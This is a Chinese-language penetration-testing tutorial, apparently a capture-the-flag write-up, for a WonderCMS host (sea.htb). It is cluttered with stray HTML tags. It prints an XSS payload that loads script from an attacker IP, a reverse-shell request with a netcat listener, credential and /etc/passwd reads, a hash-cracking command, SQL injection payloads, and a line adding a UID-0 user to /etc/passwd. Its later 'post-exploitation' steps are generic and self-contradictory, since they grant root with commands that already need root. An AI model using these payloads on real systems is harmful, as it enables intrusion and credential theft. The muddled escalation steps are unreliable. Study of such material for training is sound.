WonderCMS渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>
使用nmap进行初始端口扫描：<\/p>
nmap -sS -T4 -p- sea.htb
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22端口：SSH服务<\/li>
80端口：HTTP服务<\/li>
<\/ul>
1.2 Web应用分析<\/h3>
访问80端口Web服务：<\/p>

使用浏览器开发者工具(F12)查看页面源代码<\/li>
检查HTML注释、隐藏字段、JS文件等可能泄露敏感信息的内容<\/li>
<\/ul>
1.3 目录爆破<\/h3>
使用工具进行目录爆破（如dirb、gobuster等）：<\/p>
gobuster dir -u http:\/\/sea.htb -w \/path\/to\/wordlist.txt -x php,html,md
<\/span><\/span><\/code><\/pre>发现关键文件：<\/p>

\/README.MD<\/code>：确认系统为WonderCMS<\/li>
\/contact.php<\/code>：可能存在漏洞的功能点<\/li>
<\/ul>
2. 漏洞利用阶段<\/h2>
2.1 CVE搜索与验证<\/h3>
搜索WonderCMS相关CVE漏洞：<\/p>

确认存在CVE-2023-41425漏洞<\/li>
尝试利用SSRF(Server Side Request Forgery)漏洞<\/li>
<\/ul>
2.2 SSRF漏洞利用<\/h3>
测试contact.php的SSRF漏洞：<\/p>
POST<\/span> \/contact.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> sea.htb<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>parameter=http:\/\/internal.service
<\/span><\/span><\/code><\/pre>2.3 XSS尝试<\/h3>
尝试XSS注入：<\/p>
GET \/index.php?page=loginURL"><\/form><script src="http:\/\/10.10.16.3:8000\/xss.js"><\/script><form action= HTTP\/1.1
<\/span><\/span><\/span>Host: sea.htb
<\/span><\/span><\/span><\/code><\/pre>2.4 获取Webshell<\/h3>
利用主题目录上传webshell：<\/p>

访问\/themes\/revshell-main\/rev.php<\/code><\/li>
设置反弹shell参数：<\/li>
<\/ol>
GET<\/span> \/themes\/revshell-main\/rev.php?lhost=10.10.16.3&lport=4444 HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> sea.htb<\/span>
<\/span><\/span><\/code><\/pre>
本地监听：<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>3. 权限提升阶段<\/h2>
3.1 内网信息收集<\/h3>
获取初始shell后执行：<\/p>
# 查看系统用户<\/span>
<\/span><\/span>cat \/etc\/passwd
<\/span><\/span>
<\/span><\/span># 查找数据库文件<\/span>
<\/span><\/span>find \/ -name "*.db"<\/span> -type f 2>\/dev\/null
<\/span><\/span>
<\/span><\/span># 检查网络配置<\/span>
<\/span><\/span>ifconfig
<\/span><\/span>netstat -tulnp
<\/span><\/span><\/code><\/pre>3.2 数据库凭证获取<\/h3>
定位并读取数据库文件：<\/p>
cat \/var\/www\/html\/data\/database.db
<\/span><\/span><\/code><\/pre>发现密码哈希：<\/p>
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"
<\/code><\/pre>
3.3 哈希破解<\/h3>
使用hashcat破解：<\/p>
hashcat -m 3200<\/span> hash.txt \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>3.4 SSH登录<\/h3>
使用破解的密码尝试SSH登录：<\/p>
ssh username@sea.htb
<\/span><\/span><\/code><\/pre>3.5 横向移动<\/h3>

检查sudo权限：<\/li>
<\/ol>
sudo -l
<\/span><\/span><\/code><\/pre>
尝试切换用户：<\/li>
<\/ol>
su - otheruser
<\/span><\/span><\/code><\/pre>4. 权限维持与后渗透<\/h2>
4.1 代理搭建<\/h3>
建立SSH动态端口转发：<\/p>
ssh -D 1080<\/span> username@sea.htb
<\/span><\/span><\/code><\/pre>配置浏览器使用SOCKS代理(127.0.0.1:1080)访问内网资源。<\/p>
4.2 文件读取漏洞利用<\/h3>
发现文件读取漏洞：<\/p>
GET<\/span> \/vulnerable.php?file=\/etc\/passwd HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> sea.htb<\/span>
<\/span><\/span><\/code><\/pre>4.3 SQL注入测试<\/h3>
发现SQL注入点：<\/p>
GET \/search.php?q=1' AND 1=1-- - HTTP\/1.1
<\/span><\/span><\/span>Host: sea.htb
<\/span><\/span><\/span><\/code><\/pre>使用sqlmap自动化测试：<\/p>
sqlmap -u "http:\/\/sea.htb\/search.php?q=1"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span>
<\/span><\/span><\/code><\/pre>4.4 获取root权限<\/h3>

添加用户到sudo组：<\/li>
<\/ol>
sudo usermod -aG sudo username
<\/span><\/span><\/code><\/pre>
或者直接添加root用户：<\/li>
<\/ol>
echo "root2:passwordhash:0:0:root:\/root:\/bin\/bash"<\/span> >> \/etc\/passwd
<\/span><\/span><\/code><\/pre>5. 漏洞总结与修复建议<\/h2>
5.1 发现的主要漏洞<\/h3>

WonderCMS已知CVE漏洞(CVE-2023-41425)<\/li>
SSRF漏洞(contact.php)<\/li>
不安全的文件上传(主题目录)<\/li>
弱密码哈希存储<\/li>
不必要服务暴露(22端口)<\/li>
文件读取漏洞<\/li>
潜在的SQL注入漏洞<\/li>
<\/ol>
5.2 修复建议<\/h3>

及时更新WonderCMS到最新版本<\/li>
对用户输入进行严格过滤和验证<\/li>
禁用不必要的服务和端口<\/li>
使用强密码策略和加盐哈希<\/li>
实施最小权限原则<\/li>
定期进行安全审计和渗透测试<\/li>
设置Web应用防火墙(WAF)规则<\/li>
<\/ol>
6. 工具清单<\/h2>
本次渗透测试使用的主要工具：<\/p>

nmap：端口扫描<\/li>
gobuster\/dirb：目录爆破<\/li>
netcat：反弹shell<\/li>
hashcat：密码哈希破解<\/li>
sqlmap：SQL注入测试<\/li>
ssh：远程访问和端口转发<\/li>
浏览器开发者工具：前端分析<\/li>
<\/ul>
通过以上步骤，我们完成了从信息收集到获取root权限的完整渗透测试流程。每个环节都需要仔细分析和验证，确保测试的准确性和有效性。<\/p>